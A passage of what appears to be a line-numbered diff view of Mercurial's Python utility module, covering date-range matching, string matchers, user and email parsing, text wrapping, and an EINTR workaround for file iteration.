2073 if offset < -50400 or offset > 43200:
2072 if offset < -50400 or offset > 43200:
2074 raise error.ParseError(_('impossible time zone offset: %d') % offset)
2073 raise error.ParseError(_('impossible time zone offset: %d') % offset)
2075 return when, offset
2074 return when, offset
2076
2075
2077 def matchdate(date):
2076 def matchdate(date):
2078 """Return a function that matches a given date match specifier
2077 """Return a function that matches a given date match specifier
2079
2078
2080 Formats include:
2079 Formats include:
2081
2080
2082 '{date}' match a given date to the accuracy provided
2081 '{date}' match a given date to the accuracy provided
2083
2082
2084 '<{date}' on or before a given date
2083 '<{date}' on or before a given date
2085
2084
2086 '>{date}' on or after a given date
2085 '>{date}' on or after a given date
2087
2086
2088 >>> p1 = parsedate("10:29:59")
2087 >>> p1 = parsedate("10:29:59")
2089 >>> p2 = parsedate("10:30:00")
2088 >>> p2 = parsedate("10:30:00")
2090 >>> p3 = parsedate("10:30:59")
2089 >>> p3 = parsedate("10:30:59")
2091 >>> p4 = parsedate("10:31:00")
2090 >>> p4 = parsedate("10:31:00")
2092 >>> p5 = parsedate("Sep 15 10:30:00 1999")
2091 >>> p5 = parsedate("Sep 15 10:30:00 1999")
2093 >>> f = matchdate("10:30")
2092 >>> f = matchdate("10:30")
2094 >>> f(p1[0])
2093 >>> f(p1[0])
2095 False
2094 False
2096 >>> f(p2[0])
2095 >>> f(p2[0])
2097 True
2096 True
2098 >>> f(p3[0])
2097 >>> f(p3[0])
2099 True
2098 True
2100 >>> f(p4[0])
2099 >>> f(p4[0])
2101 False
2100 False
2102 >>> f(p5[0])
2101 >>> f(p5[0])
2103 False
2102 False
2104 """
2103 """
2105
2104
2106 def lower(date):
2105 def lower(date):
2107 d = {'mb': "1", 'd': "1"}
2106 d = {'mb': "1", 'd': "1"}
2108 return parsedate(date, extendeddateformats, d)[0]
2107 return parsedate(date, extendeddateformats, d)[0]
2109
2108
2110 def upper(date):
2109 def upper(date):
2111 d = {'mb': "12", 'HI': "23", 'M': "59", 'S': "59"}
2110 d = {'mb': "12", 'HI': "23", 'M': "59", 'S': "59"}
2112 for days in ("31", "30", "29"):
2111 for days in ("31", "30", "29"):
2113 try:
2112 try:
2114 d["d"] = days
2113 d["d"] = days
2115 return parsedate(date, extendeddateformats, d)[0]
2114 return parsedate(date, extendeddateformats, d)[0]
2116 except Abort:
2115 except Abort:
2117 pass
2116 pass
2118 d["d"] = "28"
2117 d["d"] = "28"
2119 return parsedate(date, extendeddateformats, d)[0]
2118 return parsedate(date, extendeddateformats, d)[0]
2120
2119
2121 date = date.strip()
2120 date = date.strip()
2122
2121
2123 if not date:
2122 if not date:
2124 raise Abort(_("dates cannot consist entirely of whitespace"))
2123 raise Abort(_("dates cannot consist entirely of whitespace"))
2125 elif date[0] == "<":
2124 elif date[0] == "<":
2126 if not date[1:]:
2125 if not date[1:]:
2127 raise Abort(_("invalid day spec, use '<DATE'"))
2126 raise Abort(_("invalid day spec, use '<DATE'"))
2128 when = upper(date[1:])
2127 when = upper(date[1:])
2129 return lambda x: x <= when
2128 return lambda x: x <= when
2130 elif date[0] == ">":
2129 elif date[0] == ">":
2131 if not date[1:]:
2130 if not date[1:]:
2132 raise Abort(_("invalid day spec, use '>DATE'"))
2131 raise Abort(_("invalid day spec, use '>DATE'"))
2133 when = lower(date[1:])
2132 when = lower(date[1:])
2134 return lambda x: x >= when
2133 return lambda x: x >= when
2135 elif date[0] == "-":
2134 elif date[0] == "-":
2136 try:
2135 try:
2137 days = int(date[1:])
2136 days = int(date[1:])
2138 except ValueError:
2137 except ValueError:
2139 raise Abort(_("invalid day spec: %s") % date[1:])
2138 raise Abort(_("invalid day spec: %s") % date[1:])
2140 if days < 0:
2139 if days < 0:
2141 raise Abort(_("%s must be nonnegative (see 'hg help dates')")
2140 raise Abort(_("%s must be nonnegative (see 'hg help dates')")
2142 % date[1:])
2141 % date[1:])
2143 when = makedate()[0] - days * 3600 * 24
2142 when = makedate()[0] - days * 3600 * 24
2144 return lambda x: x >= when
2143 return lambda x: x >= when
2145 elif " to " in date:
2144 elif " to " in date:
2146 a, b = date.split(" to ")
2145 a, b = date.split(" to ")
2147 start, stop = lower(a), upper(b)
2146 start, stop = lower(a), upper(b)
2148 return lambda x: x >= start and x <= stop
2147 return lambda x: x >= start and x <= stop
2149 else:
2148 else:
2150 start, stop = lower(date), upper(date)
2149 start, stop = lower(date), upper(date)
2151 return lambda x: x >= start and x <= stop
2150 return lambda x: x >= start and x <= stop
2152
2151
2153 def stringmatcher(pattern, casesensitive=True):
2152 def stringmatcher(pattern, casesensitive=True):
2154 """
2153 """
2155 accepts a string, possibly starting with 're:' or 'literal:' prefix.
2154 accepts a string, possibly starting with 're:' or 'literal:' prefix.
2156 returns the matcher name, pattern, and matcher function.
2155 returns the matcher name, pattern, and matcher function.
2157 missing or unknown prefixes are treated as literal matches.
2156 missing or unknown prefixes are treated as literal matches.
2158
2157
2159 helper for tests:
2158 helper for tests:
2160 >>> def test(pattern, *tests):
2159 >>> def test(pattern, *tests):
2161 ... kind, pattern, matcher = stringmatcher(pattern)
2160 ... kind, pattern, matcher = stringmatcher(pattern)
2162 ... return (kind, pattern, [bool(matcher(t)) for t in tests])
2161 ... return (kind, pattern, [bool(matcher(t)) for t in tests])
2163 >>> def itest(pattern, *tests):
2162 >>> def itest(pattern, *tests):
2164 ... kind, pattern, matcher = stringmatcher(pattern, casesensitive=False)
2163 ... kind, pattern, matcher = stringmatcher(pattern, casesensitive=False)
2165 ... return (kind, pattern, [bool(matcher(t)) for t in tests])
2164 ... return (kind, pattern, [bool(matcher(t)) for t in tests])
2166
2165
2167 exact matching (no prefix):
2166 exact matching (no prefix):
2168 >>> test('abcdefg', 'abc', 'def', 'abcdefg')
2167 >>> test('abcdefg', 'abc', 'def', 'abcdefg')
2169 ('literal', 'abcdefg', [False, False, True])
2168 ('literal', 'abcdefg', [False, False, True])
2170
2169
2171 regex matching ('re:' prefix)
2170 regex matching ('re:' prefix)
2172 >>> test('re:a.+b', 'nomatch', 'fooadef', 'fooadefbar')
2171 >>> test('re:a.+b', 'nomatch', 'fooadef', 'fooadefbar')
2173 ('re', 'a.+b', [False, False, True])
2172 ('re', 'a.+b', [False, False, True])
2174
2173
2175 force exact matches ('literal:' prefix)
2174 force exact matches ('literal:' prefix)
2176 >>> test('literal:re:foobar', 'foobar', 're:foobar')
2175 >>> test('literal:re:foobar', 'foobar', 're:foobar')
2177 ('literal', 're:foobar', [False, True])
2176 ('literal', 're:foobar', [False, True])
2178
2177
2179 unknown prefixes are ignored and treated as literals
2178 unknown prefixes are ignored and treated as literals
2180 >>> test('foo:bar', 'foo', 'bar', 'foo:bar')
2179 >>> test('foo:bar', 'foo', 'bar', 'foo:bar')
2181 ('literal', 'foo:bar', [False, False, True])
2180 ('literal', 'foo:bar', [False, False, True])
2182
2181
2183 case insensitive regex matches
2182 case insensitive regex matches
2184 >>> itest('re:A.+b', 'nomatch', 'fooadef', 'fooadefBar')
2183 >>> itest('re:A.+b', 'nomatch', 'fooadef', 'fooadefBar')
2185 ('re', 'A.+b', [False, False, True])
2184 ('re', 'A.+b', [False, False, True])
2186
2185
2187 case insensitive literal matches
2186 case insensitive literal matches
2188 >>> itest('ABCDEFG', 'abc', 'def', 'abcdefg')
2187 >>> itest('ABCDEFG', 'abc', 'def', 'abcdefg')
2189 ('literal', 'ABCDEFG', [False, False, True])
2188 ('literal', 'ABCDEFG', [False, False, True])
2190 """
2189 """
2191 if pattern.startswith('re:'):
2190 if pattern.startswith('re:'):
2192 pattern = pattern[3:]
2191 pattern = pattern[3:]
2193 try:
2192 try:
2194 flags = 0
2193 flags = 0
2195 if not casesensitive:
2194 if not casesensitive:
2196 flags = remod.I
2195 flags = remod.I
2197 regex = remod.compile(pattern, flags)
2196 regex = remod.compile(pattern, flags)
2198 except remod.error as e:
2197 except remod.error as e:
2199 raise error.ParseError(_('invalid regular expression: %s')
2198 raise error.ParseError(_('invalid regular expression: %s')
2200 % e)
2199 % e)
2201 return 're', pattern, regex.search
2200 return 're', pattern, regex.search
2202 elif pattern.startswith('literal:'):
2201 elif pattern.startswith('literal:'):
2203 pattern = pattern[8:]
2202 pattern = pattern[8:]
2204
2203
2205 match = pattern.__eq__
2204 match = pattern.__eq__
2206
2205
2207 if not casesensitive:
2206 if not casesensitive:
2208 ipat = encoding.lower(pattern)
2207 ipat = encoding.lower(pattern)
2209 match = lambda s: ipat == encoding.lower(s)
2208 match = lambda s: ipat == encoding.lower(s)
2210 return 'literal', pattern, match
2209 return 'literal', pattern, match
2211
2210
2212 def shortuser(user):
2211 def shortuser(user):
2213 """Return a short representation of a user name or email address."""
2212 """Return a short representation of a user name or email address."""
2214 f = user.find('@')
2213 f = user.find('@')
2215 if f >= 0:
2214 if f >= 0:
2216 user = user[:f]
2215 user = user[:f]
2217 f = user.find('<')
2216 f = user.find('<')
2218 if f >= 0:
2217 if f >= 0:
2219 user = user[f + 1:]
2218 user = user[f + 1:]
2220 f = user.find(' ')
2219 f = user.find(' ')
2221 if f >= 0:
2220 if f >= 0:
2222 user = user[:f]
2221 user = user[:f]
2223 f = user.find('.')
2222 f = user.find('.')
2224 if f >= 0:
2223 if f >= 0:
2225 user = user[:f]
2224 user = user[:f]
2226 return user
2225 return user
2227
2226
2228 def emailuser(user):
2227 def emailuser(user):
2229 """Return the user portion of an email address."""
2228 """Return the user portion of an email address."""
2230 f = user.find('@')
2229 f = user.find('@')
2231 if f >= 0:
2230 if f >= 0:
2232 user = user[:f]
2231 user = user[:f]
2233 f = user.find('<')
2232 f = user.find('<')
2234 if f >= 0:
2233 if f >= 0:
2235 user = user[f + 1:]
2234 user = user[f + 1:]
2236 return user
2235 return user
2237
2236
2238 def email(author):
2237 def email(author):
2239 '''get email of author.'''
2238 '''get email of author.'''
2240 r = author.find('>')
2239 r = author.find('>')
2241 if r == -1:
2240 if r == -1:
2242 r = None
2241 r = None
2243 return author[author.find('<') + 1:r]
2242 return author[author.find('<') + 1:r]
2244
2243
2245 def ellipsis(text, maxlength=400):
2244 def ellipsis(text, maxlength=400):
2246 """Trim string to at most maxlength (default: 400) columns in display."""
2245 """Trim string to at most maxlength (default: 400) columns in display."""
2247 return encoding.trim(text, maxlength, ellipsis='...')
2246 return encoding.trim(text, maxlength, ellipsis='...')
2248
2247
2249 def unitcountfn(*unittable):
2248 def unitcountfn(*unittable):
2250 '''return a function that renders a readable count of some quantity'''
2249 '''return a function that renders a readable count of some quantity'''
2251
2250
2252 def go(count):
2251 def go(count):
2253 for multiplier, divisor, format in unittable:
2252 for multiplier, divisor, format in unittable:
2254 if abs(count) >= divisor * multiplier:
2253 if abs(count) >= divisor * multiplier:
2255 return format % (count / float(divisor))
2254 return format % (count / float(divisor))
2256 return unittable[-1][2] % count
2255 return unittable[-1][2] % count
2257
2256
2258 return go
2257 return go
2259
2258
2260 def processlinerange(fromline, toline):
2259 def processlinerange(fromline, toline):
2261 """Check that linerange <fromline>:<toline> makes sense and return a
2260 """Check that linerange <fromline>:<toline> makes sense and return a
2262 0-based range.
2261 0-based range.
2263
2262
2264 >>> processlinerange(10, 20)
2263 >>> processlinerange(10, 20)
2265 (9, 20)
2264 (9, 20)
2266 >>> processlinerange(2, 1)
2265 >>> processlinerange(2, 1)
2267 Traceback (most recent call last):
2266 Traceback (most recent call last):
2268 ...
2267 ...
2269 ParseError: line range must be positive
2268 ParseError: line range must be positive
2270 >>> processlinerange(0, 5)
2269 >>> processlinerange(0, 5)
2271 Traceback (most recent call last):
2270 Traceback (most recent call last):
2272 ...
2271 ...
2273 ParseError: fromline must be strictly positive
2272 ParseError: fromline must be strictly positive
2274 """
2273 """
2275 if toline - fromline < 0:
2274 if toline - fromline < 0:
2276 raise error.ParseError(_("line range must be positive"))
2275 raise error.ParseError(_("line range must be positive"))
2277 if fromline < 1:
2276 if fromline < 1:
2278 raise error.ParseError(_("fromline must be strictly positive"))
2277 raise error.ParseError(_("fromline must be strictly positive"))
2279 return fromline - 1, toline
2278 return fromline - 1, toline
2280
2279
2281 bytecount = unitcountfn(
2280 bytecount = unitcountfn(
2282 (100, 1 << 30, _('%.0f GB')),
2281 (100, 1 << 30, _('%.0f GB')),
2283 (10, 1 << 30, _('%.1f GB')),
2282 (10, 1 << 30, _('%.1f GB')),
2284 (1, 1 << 30, _('%.2f GB')),
2283 (1, 1 << 30, _('%.2f GB')),
2285 (100, 1 << 20, _('%.0f MB')),
2284 (100, 1 << 20, _('%.0f MB')),
2286 (10, 1 << 20, _('%.1f MB')),
2285 (10, 1 << 20, _('%.1f MB')),
2287 (1, 1 << 20, _('%.2f MB')),
2286 (1, 1 << 20, _('%.2f MB')),
2288 (100, 1 << 10, _('%.0f KB')),
2287 (100, 1 << 10, _('%.0f KB')),
2289 (10, 1 << 10, _('%.1f KB')),
2288 (10, 1 << 10, _('%.1f KB')),
2290 (1, 1 << 10, _('%.2f KB')),
2289 (1, 1 << 10, _('%.2f KB')),
2291 (1, 1, _('%.0f bytes')),
2290 (1, 1, _('%.0f bytes')),
2292 )
2291 )
2293
2292
2294 # Matches a single EOL which can either be a CRLF where repeated CR
2293 # Matches a single EOL which can either be a CRLF where repeated CR
2295 # are removed or a LF. We do not care about old Macintosh files, so a
2294 # are removed or a LF. We do not care about old Macintosh files, so a
2296 # stray CR is an error.
2295 # stray CR is an error.
2297 _eolre = remod.compile(br'\r*\n')
2296 _eolre = remod.compile(br'\r*\n')
2298
2297
2299 def tolf(s):
2298 def tolf(s):
2300 return _eolre.sub('\n', s)
2299 return _eolre.sub('\n', s)
2301
2300
2302 def tocrlf(s):
2301 def tocrlf(s):
2303 return _eolre.sub('\r\n', s)
2302 return _eolre.sub('\r\n', s)
2304
2303
2305 if pycompat.oslinesep == '\r\n':
2304 if pycompat.oslinesep == '\r\n':
2306 tonativeeol = tocrlf
2305 tonativeeol = tocrlf
2307 fromnativeeol = tolf
2306 fromnativeeol = tolf
2308 else:
2307 else:
2309 tonativeeol = pycompat.identity
2308 tonativeeol = pycompat.identity
2310 fromnativeeol = pycompat.identity
2309 fromnativeeol = pycompat.identity
2311
2310
2312 def escapestr(s):
2311 def escapestr(s):
2313 # call underlying function of s.encode('string_escape') directly for
2312 # call underlying function of s.encode('string_escape') directly for
2314 # Python 3 compatibility
2313 # Python 3 compatibility
2315 return codecs.escape_encode(s)[0]
2314 return codecs.escape_encode(s)[0]
2316
2315
2317 def unescapestr(s):
2316 def unescapestr(s):
2318 return codecs.escape_decode(s)[0]
2317 return codecs.escape_decode(s)[0]
2319
2318
2320 def forcebytestr(obj):
2319 def forcebytestr(obj):
2321 """Portably format an arbitrary object (e.g. exception) into a byte
2320 """Portably format an arbitrary object (e.g. exception) into a byte
2322 string."""
2321 string."""
2323 try:
2322 try:
2324 return pycompat.bytestr(obj)
2323 return pycompat.bytestr(obj)
2325 except UnicodeEncodeError:
2324 except UnicodeEncodeError:
2326 # non-ascii string, may be lossy
2325 # non-ascii string, may be lossy
2327 return pycompat.bytestr(encoding.strtolocal(str(obj)))
2326 return pycompat.bytestr(encoding.strtolocal(str(obj)))
2328
2327
2329 def uirepr(s):
2328 def uirepr(s):
2330 # Avoid double backslash in Windows path repr()
2329 # Avoid double backslash in Windows path repr()
2331 return repr(s).replace('\\\\', '\\')
2330 return repr(s).replace('\\\\', '\\')
2332
2331
2333 # delay import of textwrap
2332 # delay import of textwrap
2334 def MBTextWrapper(**kwargs):
2333 def MBTextWrapper(**kwargs):
2335 class tw(textwrap.TextWrapper):
2334 class tw(textwrap.TextWrapper):
2336 """
2335 """
2337 Extend TextWrapper for width-awareness.
2336 Extend TextWrapper for width-awareness.
2338
2337
2339 Neither number of 'bytes' in any encoding nor 'characters' is
2338 Neither number of 'bytes' in any encoding nor 'characters' is
2340 appropriate to calculate terminal columns for specified string.
2339 appropriate to calculate terminal columns for specified string.
2341
2340
2342 Original TextWrapper implementation uses built-in 'len()' directly,
2341 Original TextWrapper implementation uses built-in 'len()' directly,
2343 so overriding is needed to use width information of each characters.
2342 so overriding is needed to use width information of each characters.
2344
2343
2345 In addition, characters classified into 'ambiguous' width are
2344 In addition, characters classified into 'ambiguous' width are
2346 treated as wide in East Asian area, but as narrow in other.
2345 treated as wide in East Asian area, but as narrow in other.
2347
2346
2348 This requires use decision to determine width of such characters.
2347 This requires use decision to determine width of such characters.
2349 """
2348 """
2350 def _cutdown(self, ucstr, space_left):
2349 def _cutdown(self, ucstr, space_left):
2351 l = 0
2350 l = 0
2352 colwidth = encoding.ucolwidth
2351 colwidth = encoding.ucolwidth
2353 for i in xrange(len(ucstr)):
2352 for i in xrange(len(ucstr)):
2354 l += colwidth(ucstr[i])
2353 l += colwidth(ucstr[i])
2355 if space_left < l:
2354 if space_left < l:
2356 return (ucstr[:i], ucstr[i:])
2355 return (ucstr[:i], ucstr[i:])
2357 return ucstr, ''
2356 return ucstr, ''
2358
2357
2359 # overriding of base class
2358 # overriding of base class
2360 def _handle_long_word(self, reversed_chunks, cur_line, cur_len, width):
2359 def _handle_long_word(self, reversed_chunks, cur_line, cur_len, width):
2361 space_left = max(width - cur_len, 1)
2360 space_left = max(width - cur_len, 1)
2362
2361
2363 if self.break_long_words:
2362 if self.break_long_words:
2364 cut, res = self._cutdown(reversed_chunks[-1], space_left)
2363 cut, res = self._cutdown(reversed_chunks[-1], space_left)
2365 cur_line.append(cut)
2364 cur_line.append(cut)
2366 reversed_chunks[-1] = res
2365 reversed_chunks[-1] = res
2367 elif not cur_line:
2366 elif not cur_line:
2368 cur_line.append(reversed_chunks.pop())
2367 cur_line.append(reversed_chunks.pop())
2369
2368
2370 # this overriding code is imported from TextWrapper of Python 2.6
2369 # this overriding code is imported from TextWrapper of Python 2.6
2371 # to calculate columns of string by 'encoding.ucolwidth()'
2370 # to calculate columns of string by 'encoding.ucolwidth()'
2372 def _wrap_chunks(self, chunks):
2371 def _wrap_chunks(self, chunks):
2373 colwidth = encoding.ucolwidth
2372 colwidth = encoding.ucolwidth
2374
2373
2375 lines = []
2374 lines = []
2376 if self.width <= 0:
2375 if self.width <= 0:
2377 raise ValueError("invalid width %r (must be > 0)" % self.width)
2376 raise ValueError("invalid width %r (must be > 0)" % self.width)
2378
2377
2379 # Arrange in reverse order so items can be efficiently popped
2378 # Arrange in reverse order so items can be efficiently popped
2380 # from a stack of chucks.
2379 # from a stack of chucks.
2381 chunks.reverse()
2380 chunks.reverse()
2382
2381
2383 while chunks:
2382 while chunks:
2384
2383
2385 # Start the list of chunks that will make up the current line.
2384 # Start the list of chunks that will make up the current line.
2386 # cur_len is just the length of all the chunks in cur_line.
2385 # cur_len is just the length of all the chunks in cur_line.
2387 cur_line = []
2386 cur_line = []
2388 cur_len = 0
2387 cur_len = 0
2389
2388
2390 # Figure out which static string will prefix this line.
2389 # Figure out which static string will prefix this line.
2391 if lines:
2390 if lines:
2392 indent = self.subsequent_indent
2391 indent = self.subsequent_indent
2393 else:
2392 else:
2394 indent = self.initial_indent
2393 indent = self.initial_indent
2395
2394
2396 # Maximum width for this line.
2395 # Maximum width for this line.
2397 width = self.width - len(indent)
2396 width = self.width - len(indent)
2398
2397
2399 # First chunk on line is whitespace -- drop it, unless this
2398 # First chunk on line is whitespace -- drop it, unless this
2400 # is the very beginning of the text (i.e. no lines started yet).
2399 # is the very beginning of the text (i.e. no lines started yet).
2401 if self.drop_whitespace and chunks[-1].strip() == r'' and lines:
2400 if self.drop_whitespace and chunks[-1].strip() == r'' and lines:
2402 del chunks[-1]
2401 del chunks[-1]
2403
2402
2404 while chunks:
2403 while chunks:
2405 l = colwidth(chunks[-1])
2404 l = colwidth(chunks[-1])
2406
2405
2407 # Can at least squeeze this chunk onto the current line.
2406 # Can at least squeeze this chunk onto the current line.
2408 if cur_len + l <= width:
2407 if cur_len + l <= width:
2409 cur_line.append(chunks.pop())
2408 cur_line.append(chunks.pop())
2410 cur_len += l
2409 cur_len += l
2411
2410
2412 # Nope, this line is full.
2411 # Nope, this line is full.
2413 else:
2412 else:
2414 break
2413 break
2415
2414
2416 # The current line is full, and the next chunk is too big to
2415 # The current line is full, and the next chunk is too big to
2417 # fit on *any* line (not just this one).
2416 # fit on *any* line (not just this one).
2418 if chunks and colwidth(chunks[-1]) > width:
2417 if chunks and colwidth(chunks[-1]) > width:
2419 self._handle_long_word(chunks, cur_line, cur_len, width)
2418 self._handle_long_word(chunks, cur_line, cur_len, width)
2420
2419
2421 # If the last chunk on this line is all whitespace, drop it.
2420 # If the last chunk on this line is all whitespace, drop it.
2422 if (self.drop_whitespace and
2421 if (self.drop_whitespace and
2423 cur_line and cur_line[-1].strip() == r''):
2422 cur_line and cur_line[-1].strip() == r''):
2424 del cur_line[-1]
2423 del cur_line[-1]
2425
2424
2426 # Convert current line back to a string and store it in list
2425 # Convert current line back to a string and store it in list
2427 # of all lines (return value).
2426 # of all lines (return value).
2428 if cur_line:
2427 if cur_line:
2429 lines.append(indent + r''.join(cur_line))
2428 lines.append(indent + r''.join(cur_line))
2430
2429
2431 return lines
2430 return lines
2432
2431
2433 global MBTextWrapper
2432 global MBTextWrapper
2434 MBTextWrapper = tw
2433 MBTextWrapper = tw
2435 return tw(**kwargs)
2434 return tw(**kwargs)
2436
2435
2437 def wrap(line, width, initindent='', hangindent=''):
2436 def wrap(line, width, initindent='', hangindent=''):
2438 maxindent = max(len(hangindent), len(initindent))
2437 maxindent = max(len(hangindent), len(initindent))
2439 if width <= maxindent:
2438 if width <= maxindent:
2440 # adjust for weird terminal size
2439 # adjust for weird terminal size
2441 width = max(78, maxindent + 1)
2440 width = max(78, maxindent + 1)
2442 line = line.decode(pycompat.sysstr(encoding.encoding),
2441 line = line.decode(pycompat.sysstr(encoding.encoding),
2443 pycompat.sysstr(encoding.encodingmode))
2442 pycompat.sysstr(encoding.encodingmode))
2444 initindent = initindent.decode(pycompat.sysstr(encoding.encoding),
2443 initindent = initindent.decode(pycompat.sysstr(encoding.encoding),
2445 pycompat.sysstr(encoding.encodingmode))
2444 pycompat.sysstr(encoding.encodingmode))
2446 hangindent = hangindent.decode(pycompat.sysstr(encoding.encoding),
2445 hangindent = hangindent.decode(pycompat.sysstr(encoding.encoding),
2447 pycompat.sysstr(encoding.encodingmode))
2446 pycompat.sysstr(encoding.encodingmode))
2448 wrapper = MBTextWrapper(width=width,
2447 wrapper = MBTextWrapper(width=width,
2449 initial_indent=initindent,
2448 initial_indent=initindent,
2450 subsequent_indent=hangindent)
2449 subsequent_indent=hangindent)
2451 return wrapper.fill(line).encode(pycompat.sysstr(encoding.encoding))
2450 return wrapper.fill(line).encode(pycompat.sysstr(encoding.encoding))
2452
2451
2453 if (pyplatform.python_implementation() == 'CPython' and
2452 if (pyplatform.python_implementation() == 'CPython' and
2454 sys.version_info < (3, 0)):
2453 sys.version_info < (3, 0)):
2455 # There is an issue in CPython that some IO methods do not handle EINTR
2454 # There is an issue in CPython that some IO methods do not handle EINTR
2456 # correctly. The following table shows what CPython version (and functions)
2455 # correctly. The following table shows what CPython version (and functions)
2457 # are affected (buggy: has the EINTR bug, okay: otherwise):
2456 # are affected (buggy: has the EINTR bug, okay: otherwise):
2458 #
2457 #
2459 # | < 2.7.4 | 2.7.4 to 2.7.12 | >= 3.0
2458 # | < 2.7.4 | 2.7.4 to 2.7.12 | >= 3.0
2460 # --------------------------------------------------
2459 # --------------------------------------------------
2461 # fp.__iter__ | buggy | buggy | okay
2460 # fp.__iter__ | buggy | buggy | okay
2462 # fp.read* | buggy | okay [1] | okay
2461 # fp.read* | buggy | okay [1] | okay
2463 #
2462 #
2464 # [1]: fixed by changeset 67dc99a989cd in the cpython hg repo.
2463 # [1]: fixed by changeset 67dc99a989cd in the cpython hg repo.
2465 #
2464 #
2466 # Here we workaround the EINTR issue for fileobj.__iter__. Other methods
2465 # Here we workaround the EINTR issue for fileobj.__iter__. Other methods
2467 # like "read*" are ignored for now, as Python < 2.7.4 is a minority.
2466 # like "read*" are ignored for now, as Python < 2.7.4 is a minority.
2468 #
2467 #
2469 # Although we can workaround the EINTR issue for fp.__iter__, it is slower:
2468 # Although we can workaround the EINTR issue for fp.__iter__, it is slower:
2470 # "for x in fp" is 4x faster than "for x in iter(fp.readline, '')" in
2469 # "for x in fp" is 4x faster than "for x in iter(fp.readline, '')" in
2471 # CPython 2, because CPython 2 maintains an internal readahead buffer for
2470 # CPython 2, because CPython 2 maintains an internal readahead buffer for
2472 # fp.__iter__ but not other fp.read* methods.
2471 # fp.__iter__ but not other fp.read* methods.
2473 #
2472 #
2474 # On modern systems like Linux, the "read" syscall cannot be interrupted
2473 # On modern systems like Linux, the "read" syscall cannot be interrupted
2475 # when reading "fast" files like on-disk files. So the EINTR issue only
2474 # when reading "fast" files like on-disk files. So the EINTR issue only
2476 # affects things like pipes, sockets, ttys etc. We treat "normal" (S_ISREG)
2475 # affects things like pipes, sockets, ttys etc. We treat "normal" (S_ISREG)
2477 # files approximately as "fast" files and use the fast (unsafe) code path,
2476 # files approximately as "fast" files and use the fast (unsafe) code path,
2478 # to minimize the performance impact.
2477 # to minimize the performance impact.
2479 if sys.version_info >= (2, 7, 4):
2478 if sys.version_info >= (2, 7, 4):
2480 # fp.readline deals with EINTR correctly, use it as a workaround.
2479 # fp.readline deals with EINTR correctly, use it as a workaround.
2481 def _safeiterfile(fp):
2480 def _safeiterfile(fp):
2482 return iter(fp.readline, '')
2481 return iter(fp.readline, '')
2483 else:
2482 else:
2484 # fp.read* are broken too, manually deal with EINTR in a stupid way.
2483 # fp.read* are broken too, manually deal with EINTR in a stupid way.
2485 # note: this may block longer than necessary because of bufsize.
2484 # note: this may block longer than necessary because of bufsize.
2486 def _safeiterfile(fp, bufsize=4096):
2485 def _safeiterfile(fp, bufsize=4096):
2487 fd = fp.fileno()
2486 fd = fp.fileno()
2488 line = ''
2487 line = ''
2489 while True:
2488 while True:
2490 try:
2489 try:
2491 buf = os.read(fd, bufsize)
2490 buf = os.read(fd, bufsize)
2492 except OSError as ex:
2491 except OSError as ex:
2493 # os.read only raises EINTR before any data is read
2492 # os.read only raises EINTR before any data is read
2494 if ex.errno == errno.EINTR:
2493 if ex.errno == errno.EINTR:
2495 continue
2494 continue
2496 else:
2495 else:
2497 raise
2496 raise
2498 line += buf
2497 line += buf
2499 if '\n' in buf:
2498 if '\n' in buf:
2500 splitted = line.splitlines(True)
2499 splitted = line.splitlines(True)
2501 line = ''
2500 line = ''
2502 for l in splitted:
2501 for l in splitted:
2503 if l[-1] == '\n':
2502 if l[-1] == '\n':
2504 yield l
2503 yield l
2505 else:
2504 else:
2506 line = l
2505 line = l
2507 if not buf:
2506 if not buf:
2508 break
2507 break
2509 if line:
2508 if line:
2510 yield line
2509 yield line
2511
2510
2512 def iterfile(fp):
2511 def iterfile(fp):
2513 fastpath = True
2512 fastpath = True
2514 if type(fp) is file:
2513 if type(fp) is file:
2515 fastpath = stat.S_ISREG(os.fstat(fp.fileno()).st_mode)
2514 fastpath = stat.S_ISREG(os.fstat(fp.fileno()).st_mode)
2516 if fastpath:
2515 if fastpath:
2517 return fp
2516 return fp
2518 else:
2517 else:
2519 return _safeiterfile(fp)
2518 return _safeiterfile(fp)
2520 else:
2519 else:
2521 # PyPy and CPython 3 do not have the EINTR issue thus no workaround needed.
2520 # PyPy and CPython 3 do not have the EINTR issue thus no workaround needed.
2522 def iterfile(fp):
2521 def iterfile(fp):
2523 return fp
2522 return fp
2524
2523
2525 def iterlines(iterator):
2524 def iterlines(iterator):
2526 for chunk in iterator:
2525 for chunk in iterator:
2527 for line in chunk.splitlines():
2526 for line in chunk.splitlines():
2528 yield line
2527 yield line
2529
2528
2530 def expandpath(path):
2529 def expandpath(path):
2531 return os.path.expanduser(os.path.expandvars(path))
2530 return os.path.expanduser(os.path.expandvars(path))
2532
2531
2533 def hgcmd():
2532 def hgcmd():
2534 """Return the command used to execute current hg
2533 """Return the command used to execute current hg
2535
2534
2536 This is different from hgexecutable() because on Windows we want
2535 This is different from hgexecutable() because on Windows we want
2537 to avoid things opening new shell windows like batch files, so we
2536 to avoid things opening new shell windows like batch files, so we
2538 get either the python call or current executable.
2537 get either the python call or current executable.
2539 """
2538 """
2540 if mainfrozen():
2539 if mainfrozen():
2541 if getattr(sys, 'frozen', None) == 'macosx_app':
2540 if getattr(sys, 'frozen', None) == 'macosx_app':
2542 # Env variable set by py2app
2541 # Env variable set by py2app
2543 return [encoding.environ['EXECUTABLEPATH']]
2542 return [encoding.environ['EXECUTABLEPATH']]
2544 else:
2543 else:
2545 return [pycompat.sysexecutable]
2544 return [pycompat.sysexecutable]
2546 return gethgcmd()
2545 return gethgcmd()
2547
2546
2548 def rundetached(args, condfn):
2547 def rundetached(args, condfn):
2549 """Execute the argument list in a detached process.
2548 """Execute the argument list in a detached process.
2550
2549
2551 condfn is a callable which is called repeatedly and should return
2550 condfn is a callable which is called repeatedly and should return
2552 True once the child process is known to have started successfully.
2551 True once the child process is known to have started successfully.
2553 At this point, the child process PID is returned. If the child
2552 At this point, the child process PID is returned. If the child
2554 process fails to start or finishes before condfn() evaluates to
2553 process fails to start or finishes before condfn() evaluates to
2555 True, return -1.
2554 True, return -1.
2556 """
2555 """
2557 # Windows case is easier because the child process is either
2556 # Windows case is easier because the child process is either
2558 # successfully starting and validating the condition or exiting
2557 # successfully starting and validating the condition or exiting
2559 # on failure. We just poll on its PID. On Unix, if the child
2558 # on failure. We just poll on its PID. On Unix, if the child
2560 # process fails to start, it will be left in a zombie state until
2559 # process fails to start, it will be left in a zombie state until
2561 # the parent wait on it, which we cannot do since we expect a long
2560 # the parent wait on it, which we cannot do since we expect a long
2562 # running process on success. Instead we listen for SIGCHLD telling
2561 # running process on success. Instead we listen for SIGCHLD telling
2563 # us our child process terminated.
2562 # us our child process terminated.
